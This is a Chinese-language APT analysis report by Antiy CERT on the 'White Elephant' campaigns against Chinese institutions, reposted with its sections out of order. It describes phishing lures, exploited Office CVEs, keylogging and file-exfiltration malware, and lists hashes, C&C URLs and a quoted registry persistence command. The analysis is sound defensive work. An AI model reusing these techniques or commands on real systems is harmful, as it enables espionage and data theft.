從“白象”系列攻擊中,我們還能看到中國大量基礎的信息安全環節和產品能力還不到位,“白象一代”曾被安天定性為輕量級APT攻擊,以免殺PE輔以有限的社會工程技巧,進行投放,但卻成功入侵了中國的高等學府。“白象二代”組織盡管在手法上有很大提高,但亦未見其具備0day儲備,其所使用的三個漏洞,在為“白象組織”使用時,微軟已經將其修補,而其中兩個并未經過免殺處理。而類似這樣的攻擊依然能夠大行其道,也是當前補丁、系統加固等基礎安全環節不到位、產品能力不足的體現。

相關攻擊亦說明,傳統的以單包檢測為核心的流量入侵檢測機制,實時檢測為訴求的邊界安全機制等需要得到有效補充和擴展,重要系統必須建立起在流量還原層面針對載荷投放的有效留存和異步深度檢測機制。流量還原與沙箱的組合,將成為重要系統的標配。沙箱不是簡單地補充行為分析能力,而是提升攻擊者預測防御方能力和手段的成本,而不進行能力改進,簡單漢化開源沙箱的做法,等于放棄了沙箱產品的“抗繞過”這一重要安全特性。沙箱絕非簡單的合規安全環節,當年部分IDS簡單借鑒模仿開源SNORT就能夠有效發現問題的時代已經過去。沙箱也不是簡單的擴展反病毒引擎的檢測能力,其核心價值在于有效的漏洞觸發能力和行為的揭示能力,這需要長期以來的安全積累實現工程能力轉化。而其單對象輸入,多向量輸出的產品特點,意味著這是必須依托網絡管理者和廠商支撐團隊的有效互動才能有效發揮價值的產品。

同時無論形態是PC、服務器或云,終端都是數據的基本載體,安全的終極戰場,網絡側的安全能力必須與終端側聯通,形成縱深防御體系。國產操作系統同樣需要安全手段和機制的保駕護航。任何期望御敵于網絡邊界或物理隔離的想象,任何“一招鮮,吃遍天”的打包票承諾,都只能是自我的心理安慰。

4.4 反APT是一種綜合的體系較量

反APT攻擊,要對抗攻擊者在人員、機構、裝備、工程體系方面的綜合投入,其必然是一場成本較量,今天我們看到的安全低于成本價中標等不正常的市場行為,最終都將傷害大國網絡空間安全的整體能力。

反APT攻擊,要對抗攻擊者堅定、持續的攻擊意志,而這同樣對于對抗APT的安全分析團隊提升了更高的要求,從安全廠商角度,是在感知分析工程體系支撐下的持續對抗;我們必須持續跟蹤攻擊者的技巧、意圖和路徑,將這些經驗轉化為用戶側的防御改善和產品能力更新。安全分析團隊既要有曝光對手的勇銳,也要有戍邊十載、不為人知的意志與沉穩。

此外,我們覺得遺憾的是, “白象”作為非常活躍的APT攻擊行動,在過去數年都仿佛始終在國際部大分主流安全廠商的視野之外。因此,像安天過去的多篇報告一樣,本報告也將以中、英雙語發布,盡管我們不知道會有多少海外讀者,但我們希望告知世界關于中國所遭遇到的網絡攻擊的真實情況,“中國是網絡安全受害者”這一事實必然會戰勝某些人所制造的刻板偏見。

附錄一:參考資料

[1] Norman:Unveiling_an_Indian_Cyberattack_Infrastructure

[2] CCF:反病毒方法的現狀、挑戰與改進

http://www.ccf.org.cn/resources/1190201776262/2014/05/12/10.pdf

http://zh.wikipedia.org/wiki/Bash

[3] 安天:APT事件樣本集的度量

http://www.antiy.com/resources/The_Measurement_of_APT_Sample_Set.pdf

[4] 安天技術文章匯編(十 二)-高級持續性威脅(APT)專題第二分冊

[5]安天:A2PT與“準APT”事件中的攻擊武器

http://www.antiy.com/presentation/Attack_Weapons_in_A2PT_and_APT-To-Be_Incidents.pdf

[6] 安天:沙蟲(CVE-2014-4114)相關威脅綜合分析報告——及對追影安全平臺檢測問題的復盤

http://www.antiy.com/response/cve-2014-4114.html

[7] 肖新光:美國憑什么能開啟“上帝模式”

http://news.xinhuanet.com/world/2015-09/19/c_128246851.htm

[8] FireEye:The Dual Use Exploit: CVE-2013-3906 Used in Both Targeted Attacks and Crimeware Campaigns

https://www.fireeye.com/blog/threat-research/2013/11/the-dual-use-exploit-cve-2013-3906-used-in-both-targeted-attacks-and-crimeware-campaigns.html

[9] Scumware.org:Scumware search. scumware.org

http://www.scumware.org/report/173.236.24.254

[10] Theimes:MacKenzie,Stuart

http://www.thetimes.co.uk/tto/multimedia/archive/00372/DOC100113-100120132_372895a.pdf

[11] Wikipedia:CME Group. Wikipedia

http://en.wikipedia.org/wiki/CME_Group

[12] WIPO:WIPO Arbitration and Mediation Center. WIPO

http://www.oapi.wipo.net/amc/en/domains/search/text.jsp?case=D2012-1666

[13] Scumware.org:Scumware search. Scumware.org

http://www.scumware.org/report/bluecreams.com

[14] Clean-mx:Viruswatch. Virus-sites with status changes. Clean-MX.com

http://lists.clean- mx.com/pipermail/viruswatch/20110317/023586.html

附錄二:事件日志

 

時間 相關事項
2012年7月6日 安天捕獲白象事件針對中國某高校攻擊的首個事件,當時作為一般樣本入庫,后陸續捕獲其他樣本。
2013年5月20日 Norman發布報告《OPERATION HANGOVER |Executive Summary——Unveiling an Indian Cyberattack Infrastructure》,曝光了HangOver攻擊行動。
2013年8月22日 安天在中科院某機構做小報告,介紹對“白象行動”的跟蹤分析情況。
2014年4月 安天在中國計算機學會會刊《中國計算機學會通訊》上撰文,少量披露分析進展。
2014年9月 安天在互聯網安全大會報告中,全面披露本事件,但因其他原因,報告未能發布。
2015年12月18日 相關報告被編入《安天技術文章匯編(十 二)-APT專題第二分冊》。
2016年1月26日 安天捕獲到“白象二代”利用CVE-2014-4114漏洞針對國內攻擊的樣本。
2016年2月至5月 連續捕獲到“白象二代”的魚叉式釣魚郵件。
2016年5月 在捕獲到多起事件后,安天分析人員發現和“白象一代”有關。
2016年7月5日 “白象二代”內部分析報告完成。

 

附錄三:關于安天

安天從反病毒引擎研發團隊起步,目前已發展成為以安天實驗室為總部,以企業安全公司、移動安全公司為兩翼的集團化安全企業。安天始終堅持以安全保障用戶價值為企業信仰,崇尚自主研發創新,在安全檢測引擎、移動安全、網絡協議分析還原、動態分析、終端防護、虛擬化安全等方面形成了全能力鏈布局。安天的監控預警能力覆蓋全國、產品與服務輻射多個國家。安天將大數據分析、安全可視化等方面的技術與產品體系有效結合,以海量樣本自動化分析平臺延展工程師團隊作業能力、縮短產品響應周期。結合多年積累的海量安全威脅知識庫,綜合應用大數據分析、安全可視化等方面經驗,推出了應對高級持續性威脅(APT)和面向大規模網絡與關鍵基礎設施的態勢感知與監控預警解決方案。

全球超過三十家以上的著名安全廠商、IT廠商選擇安天作為檢測能力合作伙伴,安天的反病毒引擎得以為全球近十萬臺網絡設備和網絡安全設備、近兩億部手機提供安全防護。安天移動檢測引擎是全球首個獲得AV-TEST年度獎項的中國產品。

安天技術實力得到行業管理機構、客戶和伙伴的認可,安天已連續四屆蟬聯國家級安全應急支撐單位資質,亦是中國國家信息安全漏洞庫六家首批一級支撐單位之一。

安天是中國應急響應體系中重要的企業節點,在紅色代碼、口令蠕蟲、震網、破殼、沙蟲、方程式等重大安全事件中,安天提供了先發預警、深度分析或系統的解決方案。

 

安天實驗室更多信息請訪問: http://www.antiy.com (中文)
http://www.antiy.net (英文)
安天企業安全公司更多信息請訪問: http://www.antiy.cn
安天移動安全公司(AVL TEAM)更多信息請訪問: http://www.avlsec.com

 

*本文作者:安天實驗室安全研究與應急處理中心(Antiy CERT)(企業賬號),轉載請注明來自FreeBuf黑客與極客(FreeBuf.COM)

關鍵字:白象

本文摘自:黑客與極客

x 白象的舞步——來自南亞次大陸的網絡攻擊 掃一掃
分享本文到朋友圈
當前位置:安全行業動態 → 正文

白象的舞步——來自南亞次大陸的網絡攻擊

責任編輯:editor005 |來源:企業網D1Net  2016-07-12 15:13:38 本文摘自:黑客與極客

在過去的四年中,安天的工程師們關注到了中國的機構和用戶反復遭遇來自“西南方向”的網絡入侵嘗試。這些攻擊雖進行了一些掩蓋和偽裝,我們依然可以將其推理回原點——來自南亞次大陸的某個國家。盡管我們積極地提醒和協助我們的客戶進行改進防護,并謹慎而有限地披露信息、給予警告,但這種攻擊并未偃旗息鼓,恰恰相反,其卻以更高的能力卷土重來。

1.概述

安天本報告披露其中兩組高頻度攻擊事件,盡管我們尚未最終確定這兩個攻擊波的內在關聯,但可以確定的是其具有相似的目的和同樣的國家背景,我們將其兩組攻擊統稱為——“白象行動”

1.1第一攻擊波的概況

2012年~2013年,安天陸續捕獲了來自白象組織的多次載荷投放,此后依托關聯信息同源分析,找到了數百個樣本,這些樣本多數投放的目標是巴基斯坦,少數則針對中國的高等院校和其他機構。2013年7月,安全廠商Norman所發布的報告,將這一攻擊稱為HangOver。 [1]

安天技術負責人在2014年4月在《計算機學會通訊》發表的《反病毒方法的現狀、挑戰與改進》 [2] 一文中,披露了安天捕獲到的該組織針對中國的攻擊事件:

“從2012年3月起,我們已經陸續捕獲了該事件的一些相關的樣本。而這些樣本對應的網絡事件非常稀少,呈現出高度定向的特點。”

安天在文章中披露了其中6個相關的樣本HASH和被攻擊的目標——中國的兩所高等院校。在2014年的中國互聯網安全大會上,安天在題為《APT事件樣本集的度量》 [3] 的公開報告中,對這個事件做了首次全面披露。2014年8月,安天完成了報告《白象的舞步——HangOver攻擊事件回顧及部分樣本分析》 [4] ,并將這一攻擊組織中文命名為 “白象”。

為區分兩個不同的攻擊波,我們將2012~2013年高度活躍的這組攻擊,在本報告中稱之為“白象一代”。“白象一代”投放了至少近千個不同HASH的PE樣本,使用了超過500個C&C域名地址;其開發人員較多,開發團隊技能混雜,樣本使用了VC、VB、.net、Autoit等多種環境開發編譯;同時其未使用復雜的加密算法,也未發現使用0day漏洞和1day的漏洞,而更多的是采用被部分中國安全研究者稱為“亂扔EXE”的簡易社會工程學——魚叉式網絡釣魚攻擊。PE免殺處理是該攻擊組織所使用的主要技巧,這也是使這組攻擊中的PE載荷數量很大的原因之一。在2015年6月16日的中國反病毒大會上,安天做了題為《A2PT與“準APT”事件中的攻擊武器》 [5] 的技術報告,并把這組攻擊劃分為輕量級APT攻擊。

1.2 第二攻擊波的概況

在第一攻擊波發生后,具有相關基因特點的攻擊載荷開始減少,2014年活躍度開始明顯下降。直到2015年年底,安天又發現一組來自“西南方向”的攻擊進一步活躍,通過持續跟蹤發現本次行動的攻擊主要目標依然為中國和巴基斯坦,通過安天監控預警體系分析發現,中國的受攻擊者主要為教育、軍事、科研等領域。

第二攻擊波的行動擺脫了“白象一代”雜亂無章的攻擊手法,整體攻擊行動顯得更加“正規化”和“流程化”。第二攻擊波普遍使用了具有極高社工構造技巧的魚叉式釣魚郵件進行定向投放,至少使用了CVE-2014-4114和CVE-2015-1641等三個漏洞;其在傳播層上不再單純采用附件而轉為下載鏈接、部分漏洞利用采取了反檢測技術對抗;其相關載荷的HASH數量則明顯減少,其中使用了通過Autoit腳本語言和疑似由商業攻擊平臺MSF生成的ShellCode;同時其初步具備了更為清晰的遠程控制的指令體系。

我們將這組攻擊稱為“白象二代”,我們尚無證據表明“白象一代”和“白象二代”組織間存在人員交叉。從整體上來看,“白象二代”相比“白象一代”的技術手段更為高級,其攻擊行動在整體性和技術能力上的提升,可能帶來攻擊成功率上的提升。而其采用的更加暴力和野蠻的投放方式,使其攻擊次數和影響范圍遠遠比“白象一代”更大。”

“白象二代”的技術手法相比“白象一代”有質的提升,其更符合某些研究者對于APT攻擊的“技術定義”, 但安天始終要指出,APT的“A(高級)”是相對的,是否稱為APT攻擊,主要是分析攻擊的發起方與其動機和意志,而所謂技術水平則不是定性的主要因素。同時,無論是“白象一代”輕量級的攻擊,還是“白象二代”顯得更為高明的攻擊,對于中國龐大的信息體系,特別是針對高等院校等民用機構,構成了嚴重的威脅。

2 白象一代——HangOver的樣本、目標與源頭分析

2.1概述

安天在2012年獲取導向相關的載荷最早的投放行為曾淹沒于其他海量的安全事件中,并未將相關事件判定為APT攻擊。因此需要感謝安全廠商Norman在2013年7月所發布的報告《OPERATION HANGOVER |Executive Summary——Unveiling an Indian Cyberattack Infrastructure》 [1] ,Norman在上述報告根據在分析中發現的原始工程名“HangOve”,將此事件命名為“HangOver”。這組事件即是安天稱為“白象一代”的行動。這讓安天反思過去在發現和追蹤APT攻擊中,過度考慮攻擊技巧和漏洞利用的問題,并開始針對周邊國家對中國攻擊檢測有了新的方法和視角。

安天認為“白象一代”組織中人員較多,人員能力參差不齊,采用開發編譯器混雜,作業相對混亂。通過安天后端分析平臺的關聯統計,查找到該攻擊組織的相關樣本910個,其模塊功能包括鍵盤記錄、下載器,信息竊取等,相關樣本最新的版本號為HangOver 1.5.7 (Startup)。并根據分析判斷相關組織針對中國高等院校等目標實施了攻擊行動。

2.2 樣本與資源分析

安天CERT的研究人員對安天的全樣本集,制定了針對四種編譯二進制文件的關聯方法(Method A~D ),對樣本的動靜態信息進行向量比對和關聯。對于提取出的樣本結果集合,安天CERT研究人員又基于代碼結構的對比進行了誤報排查,最終在已經被其他分析方認定的樣本之外,發現了更多樣本。

圖 2 1 使用不同方法關聯出的新的樣本比例

圖 2 2 “白象一代”挖掘到的關聯樣本的編譯器分布

其中,使用編譯的樣本29個,VB編譯的樣本 189個,VC編譯的樣本127 個。

注:Autoit是一個用于編寫自動化腳本的語言,其編寫的腳本可以編譯成壓縮、單一的可執行文件,這樣就如同其他編譯器生成的PE文件一樣,可以脫離開發環境,運行于Windows系統。

同時,安天CERT也對樣本所使用的C&C IP進行了地理位置對應:

圖 2 3 “白象一代”C&C對應的地理位置

通過對部分樣本的時間戳及編譯器數據的對比可以發現,“白象一代”的樣本編譯時間在2010年下半年到2011年下半年之間的數量最多;2010年上半年的數量較少,屬于開始階段;2012年上半年開始下降,屬于收尾階段。

圖 2 4 “白象一代”不同編譯器樣本的時間戳情況

2.3對中國境內目標的攻擊

2.3.1 攻擊樣本與事件

安天在2014年4月相關文章中,所披露的針對中國兩所大學被攻擊的實事件,涉及以下六個樣本。

 

捕獲時間 樣本hash列表 樣本編號
2012-08-10 0D466E84B10D61031A62AFFCFFF6E31A Sample 1
2012-10-21 734E552FE9FFD1FFDEA3434C62DD2E4B Sample 2
2012-07-24 9A20F6F4CDDEABC97ED46AEE05AC7A50 Sample 3
2012-07-06 CE00250552A1F913849E27851BC7CF0A Sample 4
2012-09-24 DE81F0BDBD0EF134525BCE20B05ED664 Sample 5
2012-08-01 F37DD92EF4D0B7D07A4FBDCD9329D33B Sample 6

 

“白象一代”對中國兩所高校攻擊的時間鏈:

圖 2 5 “白象一代”攻擊中國兩所大學的6個樣本的時間戳與安天捕獲時間對比

圖 2 6 “白象一代”針對中國高等院校的載荷投放攻擊與數據控制獲取的地理場景可視化復現

2.3.2 樣本情況與作業技巧

在上述攻擊中,“白象一代”至少使用了6個樣本,這些樣本采用不同的編譯器(含版本)編譯,其中有4個未加殼,有2個使用了UPX殼。

表 2 1 “白象一代”使用的6個樣本介紹

 

  編譯器 主要行為 回連地址
Sample 1 Microsoft Visual Basic 5.0 / 6.0 釋放的VBScript腳本,腳本執行后連接遠程服務器zolipas.info。(域名失效) http://zolipas.info/advd
Sample 2 Microsoft Visual Studio .NET 2005 — 2008 運行后將以下文件設置為Run自啟C:WINDOWSsystem32CatRoot2{F750E6C3-38EE-11D1-85E5-00C04FC295EE}slidebar.exe,記錄鍵盤信息并上傳。 http://linkspectra.com/k1.php

 

 

Sample 3 UPX Dev-C++ 4.9.9.2 運行后在C:ApplicationDataPrefetch 目錄下生成log.txt文件,不斷的記錄鍵盤、窗口標題、瀏覽器搜索內容、計算機用戶名等信息。  
Sample 4 UPX Microsoft Visual C++ 7.0 運行后試圖創建csetup32.dll,但未成功。
鏈接域名secureplanning.net欲下載其他惡意代碼(URL失效)。
http://secureplanning.net/download/logo2.jpg
Sample 5 Microsoft Visual Studio .NET 2005 — 2008 運行后在
c:Documents and SettingsAdministratorLocal SettingsApplication DataNTUSR目錄下創建文件ntusr1.ini,記錄用戶打開的窗口標題。
不斷地上傳樣本3記錄的信息log.txt
http://periodtable.eu/starx.php
Sample 6 Dev-C++ 4.9.9.2 樣本運行后在C:ApplicationData 目錄下釋放logFile.txt文件,收集各種相關擴展名文檔名稱  

 

圖 2 7 樣本與資源間的關聯

其中有5個樣本投放至同一個目標,這些樣本間呈現出模塊組合作業的特點。4號樣本是初始投放樣本,其具有下載其他樣本功能;3號樣本提取主機相關信息生成日志文件;5號樣本負責上傳;6號樣本采集相關文檔文件信息;2號樣本則是一個鍵盤記錄器。

圖 2 8 樣本的組合模塊作業方式

通過對比安天捕獲上述樣本時各殺毒引擎的檢測情況,以及到Norman曝光此事件后各引擎的檢測情況,可見該攻擊組織使用了一定的免殺技巧。

圖 2 9 樣本在捕獲時和被曝光時的掃描對比

2.4樣本中的典型組件分析

“白象一代”樣本集中包括了多個功能組件,包括:

 

組件名 功能
Keyloger 鍵盤記錄
download 下載
Upload 上傳
http backup HTTP上傳
FTP backup FTP上傳
Usb  Propagator U盤擺渡
Mail Password Decryptor 郵件口令解密

 

因報告篇幅所限,我們僅分析其中的竊密組件。這一組件主要功能是遍歷磁盤中敏感文件(指定擴展名的文件)、主機信息等,并上傳到攻擊者指定的服務器中。

2.4.1樣本標簽

 

病毒名稱 Trojan/Win32.Uploader
原始文件名 Hangover1.5.9.exe
MD5 0e9e46d068fea834e12b2226cc8969fd
處理器架構 X86-32
文件大小 28,9208 Bytes
文件格式 BinExecute/Microsoft.EXE[:X86]
時間戳 2012-09-13 13:09:03
編譯語言 Microsoft Visual C++

 

2.4.2 功能描述

遍歷磁盤文件,上傳敏感文件及主機信息到服務器;

添加啟動項;

遍歷敏感文件(*.doc;*.docx;*.xls;*.ppt;*.pps;*.pptx;*.xlsx;*.pdf);

上傳文件到服務器;

生成上傳文件列表;

文件上傳前,規則化重命名文件;

獲取電腦主機信息;

在當前用戶以及所有用戶啟動文件夾中添加啟動項。

2.4.3功能分析

該樣本遍歷用戶磁盤文件,上傳遍歷到的指定擴展名文件:

*.doc;*.docx;*.xls;*.ppt;*.pps;*.pptx;*.xlsx;*.pdf

每獲取一個文件,在文件上傳之前會先獲取文件時間,轉換為標準時間后和源文件名一起組成新的名字,作為上傳的文件名。主要的函數代碼如下:

圖 2 10 重命名的格式:[原有文件名稱(無后綴)+文件時間+后綴]

樣本獲取到受害主機的所有指定擴展名的文件后,回傳到指定的服務器,回傳的主要流程如下:

圖 2 11 回傳流程

2.5 攻擊來源與攻擊目標的分析

2.5.1樣本集中其他對中國有針對性的樣本分析

表 2 2 樣本標簽

 

病毒名稱 Trojan/BAT.Zapchast.at
原始文件名 未知
MD5 13107B9455561E680FE8C3B9B1E8BC37
處理器架構 X86-32
文件大小 29,4905字節
文件格式 ZIP
時間戳 2011-05-28 16:04:38
數字簽名
加殼類型 ZIP SFX
編譯語言 Microsoft Visual C++ 6.0
VT掃描結果 40 / 51

 

樣本使用PDF圖標進行偽裝,運行后衍生多個文件到系統目錄并運行,同時顯示一張圖片(如圖2-12)該圖片為中國法院的判決書,以迷惑用戶。衍生文件會添加注冊表開機啟動,記錄用戶鍵盤輸入并回傳至遠程服務器。

圖 2 12 樣本中包含帶有中文的圖片

樣本運行后衍生文件列表:

由上表可知主要的惡意文件為spoolsv.exe和ssmss.exe,以下對這兩個文件進行簡要分析。

spoolsv.exe分析:

1. 樣本運行后解密內部配置數據,共有兩處解密函數;

解密1,對一些注冊表啟動鍵值、文件名、要監控的窗體進行解密,算法就是ASCII碼減一。

圖 2 13 解密注冊表、文件名窗體等信息

解密2,對動態加載的DLL名稱、函數解密。

圖 2 14 解密DLL名稱和函數

2. 使用CMD命令添加注冊表啟動項:

HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun:InternetDownloadServices

C:WINDOWSwindowssspoolsv.exe

3.創建事件對象Global{9A8FEAD9-92E9-3F1AD79150C2}、使用注冊窗體的方式執行惡意功能代碼;

4.記錄用戶的窗體名稱和鍵盤輸入,特別是對Internet Explorer,Mozilla FireFox的子窗體進行記錄,達到記錄URL地址的目的,記錄的內容寫入sonic.ax;

圖 2 15 通過監控窗體記錄URL地址

5.每記錄100次,復制sonic.ax為sonic1.ax供ssmss.exe使用。

圖 2 16 記錄次數

ssmss.exe分析:

1. 創建事件對象:Global\{D91AD7DF91-92E9-9A8FEA3F50CRC254},獲取計算機名稱;

2. 使用CMD命令添加注冊表啟動項:

reg add HKCUSoftwareMicrosoftWindowsCurrentversion un /v WindowsFirewallSecu rityServ /t REG_SZ /d "C:Documents and Settings*桌面ssmss.exe" /f

3.循環讀取sonic1.ax內容并回傳至URL:s0pp0rtdesk.com/test00.php;

4. 回傳完信息,刪除sonic1.ax。

C&C信息:

***rtdesk.com/test00.php ***.91.197.101 美國

2.5.2 樣本集的時間戳、時區分析

樣本時間戳是一個十六進制的數據,存儲在PE文件頭里,該值一般由編譯器在開發者創建可執行文件時自動生成,時間單位細化到秒,通常可以認為該值為樣本生成時間(GMT時間)。

圖 2 17 提取時間戳

時間戳的分析需要收集所有可用的可執行文件時間戳,并剔除過早的和明顯人為修改的時間,再將其根據特定標準分組統計,如每周的天或小時,并以圖形的形式體現,下圖是通過小時分組統計結果:

圖 2 18 白象組織開發者工作時間

從上圖的統計結果來看,如果假設攻擊者的工作時間是早上八九點至下午五六點的話,那么將工作時間匹配到一個來自UTC+4 或UTC+5時區的攻擊者的工作時間。

圖 2 19 UTC+4或UTC+5的世界時區分布圖位置

根據我們匹配的攻擊者所在時區(UTC+4 或UTC+5),再對照世界時區分布圖,就可以來推斷攻擊者所在的區域或國家。

l UTC+4: 阿拉伯聯合酋長國、阿曼、毛里求斯、留尼汪/留尼旺(法)、塞舌爾、第比利斯、亞美尼亞、阿塞拜疆、阿富汗、阿布扎比。

l UTC+5: 巴基斯坦、馬爾代夫、葉卡特琳堡、烏茲別克斯坦、土庫曼斯坦、塔吉克斯坦、斯里蘭卡、印度。

2.5.3 攻擊組織分析

我們對這一攻擊組織繼續綜合線索,基于互聯網公開信息,進行了畫像分析,認為這是一個由10~16人的組成的攻擊小組。其中六人的用戶ID是cr01nk 、neeru rana、andrew、Yash、Ita nagar、Naga。

3 白象二代——受害者、漏洞和能力

3.1概述

2015年下半年開始的“白象二代”攻擊與“白象一代”有很大不同,其開始使用 CVE-2014-4114 [6] 、CVE-2015-1641等漏洞作為攻擊載荷,其不在直接在附件中投放EXE,而采用“投放社工釣魚郵件+鏈接的方式”,其PE載荷數量也大大減少。

3.1.1 時間鏈

根據安天監控預警平臺匯總的信息,“白象二代”的攻擊目標主要為中國和巴基斯坦。中國受到攻擊面積極為廣泛,“白象二代”對中國發起了大量攻擊事件。自今年以來,我們持續跟蹤該組織,圖3-1為“白象二代”行動的攻擊時間鏈。

圖 3 1 “白象二代”行動的攻擊郵件時間鏈

圖3-2為攻擊文檔存檔事件、PE文件時間戳信息:

圖 3 2 格式文檔和PE載荷時間戳

3.1.2 受害者

“白象二代”組織針對中國的攻擊目標以教育、軍事、科研領域為主。

圖 3 3 受害領域分布

3.2攻擊分析

“白象二代”組織的攻擊主要通過魚叉式釣魚電子郵件,大部分郵件以插入惡意鏈接的方式進行攻擊,通過精心構造的誘餌內容誘導受害者打開鏈接,一旦打開惡意鏈接就會下載帶有漏洞的惡意文檔。

在我們捕獲到的文檔中,大部分是利用CVE-2014-4114漏洞的PPS文件、少量利用CVE-2015-1641漏洞的rtf文件。

3.3 魚叉式釣魚攻擊

魚叉式釣魚攻擊,APT攻擊中最常見的攻擊方式,與普通的釣魚郵件不同,魚叉式釣魚攻擊不會批量的發送惡意郵件,而只針對特定的公司、組織的成員發起針對性攻擊,具體的攻擊手法又分為兩種:

1. 在郵件中植入惡意附件,誘導受害者打開附件文件。

2.在郵件正文中插入惡意鏈接,誘導受害者點擊鏈接,一旦受害人點擊鏈接就會跳轉到惡意鏈接,該鏈接或是掛馬網站,或是惡意文件下載地址。

本次行動中“白象二代”組織使用的手法主要是第二種,因為該方式在郵件中不存在附件,更容易通過安全軟件的檢測。鏈接相對附件也更容易騙取用戶的信任,郵件內的鏈接都是利用的第三方域名跳轉,多數以 為跳轉域名。

3.3.1案例1:針對中國高校教師的釣魚郵件

這是一封針對中國高校教師的魚叉式釣魚郵件,正文內容是關于南海問題,在郵件的最后誘導受害者點擊鏈接查看“完整版報告”。一旦用戶點擊該鏈接就會下載惡意文檔。該文檔使用了CVE-2014-4114漏洞,且采用PPS格式自動播放的特點,來實現文檔打開漏洞既被觸發。

圖 3 4 魚叉式釣魚郵件1

郵件內容大意為:

中國與東南亞的關系:

中國南海,更有張力和挑戰(2016年五月報告)

在2016年年初,多個國家關注中國南海爭議。以美國為首的多個國家對中國進行了言辭強烈的譴責,中國強烈譴責美國的行動和軍事部署。

北京仍然有決心解決有爭議的問題,尤其是習近平主席在2015年9月期間提出中國在南海無意搞軍事化,緊張情緒并沒有蔓延,美國,中國會議增多的跡象向東南亞各國政府表明、華盛頓沒有、北京也沒有尋求對抗。在此背景下,這些國家的政府對中國挑戰其在中國南海權益的答復仍然是衡量為主。過去,他們常常減少面對中國時的自信,展示了對中國的一些批評,變得更愿意以阻止中國,并與美國更緊密地聯系起來……

3.3.2 案例2:針對國內科研機構的釣魚郵件

這是另一封針對國內科研機構的魚叉式釣魚郵件,以一封標有TOP SECERT(絕密檔案)的文檔掃描圖片為正文誘導受害者點擊下面的“絕密報告”,一旦受害者點擊鏈接就會下載一個惡意文檔。該文檔使用了CVE-2014-4114漏洞,且采用PPS格式自動播放的特點,來實現文檔打開漏洞既被觸發。

圖 3 5 魚叉式釣魚郵件2

郵件內容中文大意為:

我們的國防部長

序號1.

Contr Nr:X-0850

日期:1969年2月20日

文檔,主題&內容:由國防部長給總統的備注:沖繩基地和部隊。響應在1月27日會議中提出的問題。注意這些都是參謀長聯席會議的答復,國防部將通過正在進行的NSC研究來提供明確的政策。因此不提供國防部長的觀點。回答的問題包括了沖繩部隊的規模,在那里的原因,未來需要的基地等。附:國防部長指出要求從參謀長聯席會議主席到總統的轉交并指出ISA還沒有評論。

序號2.

Contr Nr:X-1383

日期:1969年5月19日

文檔,主題&內容:由國防部長給參謀長聯席會議主席的備注:核能力的退化-在琉球基地和備用…

3.3.3 案例3:針對中國軍事愛好者的釣魚郵件

這是一封與軍事相關的釣魚郵件,針對中國軍事愛好者的攻擊,同樣的在正文中嵌入一個鏈接,該鏈接指向一個惡意文檔,該文檔是一份WORD文檔,采用的漏洞與前兩個案例的PPS有所不同。系一個以.doc為擴展名的RTF格式文檔,使用漏洞為CVE-2015-1641。

圖 3 6 魚叉式釣魚郵件3

3.4 相關誘餌文件

“白象二代”組織的主要使用PPS(Powerponit的自動播放格式)和具有WORD擴展名的RTF格式文檔為誘餌文件,在我們捕獲樣本中大部分都是與軍事相關的誘餌文件。

圖 3 7 “最致命的5款無人機”誘餌文件截圖

圖 3 8 “中國人民解放軍即將推出的第五代作戰條例”誘餌文件截圖

圖 3 9 “南海沖突對歐洲安全的影響”誘餌文件截圖

圖 3 10 “涉及中國的海上領土和專屬經濟區域爭端”誘餌文件截圖

圖 3 11 “中巴經濟走廊對印巴關系的影響”誘餌文件截圖

3.5 漏洞利用

安天目前監測到的“白象二代”組織使用的漏洞均為已知的Office格式文檔漏洞,部分樣本在使用了一定技巧用于對抗安全軟件的檢測,從我們對歷史掃描結果的追溯來看,這種技巧是有效的。

3.5.1 樣本標簽

 

病毒名稱 Trojan[Exploit]/Win32.CVE-2014-4114
原始文件名 2016_China_Military_PowerReport.pps
MD5 F0D9616065D96CFCBB614CE99DD8AD86
文件大小 12,801,024 字節
文件格式 Document/Microsoft.PPS
最后存檔時間 2016-05-18 05:24:54

 

3.5.2 CVE-2014-4114

我們在跟蹤沙蟲攻擊組織中,曾對CVE-2014-4114漏洞 [7] 進行過較為長時間的分析,這個漏洞的最大特點是其雖然依托格式文檔,但并非依靠格式溢出。而是通過遠程代碼執行來實現。因此穿透了Windows的DEP、ASLR機制。

白象攻擊使用的PPS擴展名樣本利用Windows OLE 遠程代碼執行漏洞CVE-2014-4114釋放并執行可執行文件。值得注意的是我們在此前分析過的其他攻擊組織使用的4114樣本中,多數為Office高版本格式,該格式是一個以XML為索引的壓縮包,其內嵌的PE載荷會被殺毒軟件在解壓遞歸中檢測到。

圖 3 12 CVE-2014-4114歷史樣本的典型結構

圖 3 13 “白象二代”相關樣本的結構

但這次“白象二代”組織使用了低版本Office的傳統LAOLA格式,由于對安全廠商來說這是一個“未公開格式”,達到了一定的免殺效果。如圖3-14是多引擎對照掃描結果,可以看出此樣本的確躲避了大部分安全軟件的檢測。

注:LAOLA文件格式是微軟在早期OFFICE版本自定義的“復合文檔二進制結構”(Compound File Binary Format),微軟未公開相關文件格式。但傳統反病毒廠商為有效應對宏病毒,通過逆向工程方式,對該結構形成了解析能力。但該格式對很多新興安全廠商構成了障礙。

圖 3 14 多引擎掃描結果

3.5.3 其他

該組織除了利用上面提到的漏洞外,還有少部分文件利用了CVE-2015-1761 、CVE-2012-0158漏洞,這兩個漏洞的載荷都針對WORD設計,對于這兩種漏洞,攻擊者并沒有作的檢測對抗,基本上直接利用了網上公開的利用代碼,因此現有反病毒引擎對于這兩種漏洞文件的檢出率相對較高。

3.6 功能樣本情況

從目前捕獲的樣本來看,“白象二代”組織使用的PE載荷樣本技術水平不高,沒有較為復雜的模塊體系和加密抗分析機制,一部分樣本是利用的腳本語言編寫的程序,還有一些是采用網上公開的代碼重新編譯后利用。

3.6.1 竊密模塊

樣本標簽:

 

病毒名稱 Trojan/Win32.AutoIT
原始文件名 sysvolinfo.exe
MD5 A4FB5A6765CB8A30A8393D608C39D9F7
處理器架構 X86-32
文件大小 11,659,903 字節
文件格式 BinExecute/Microsoft.EXE[:X64]
時間戳 2016-05-13 07:55:20
數字簽名 NO
加殼類型
編譯語言 AutoIT

 

白象二代組織使用的攻擊樣本中,有多個樣本是使用Autoit編寫的,主要目的用于竊取數據并打包回傳到遠程服務器,具體的功能如下:

1.回傳系統基本信息,包括系統版本,架構,是否裝有Chrome,樣本版本信息等;

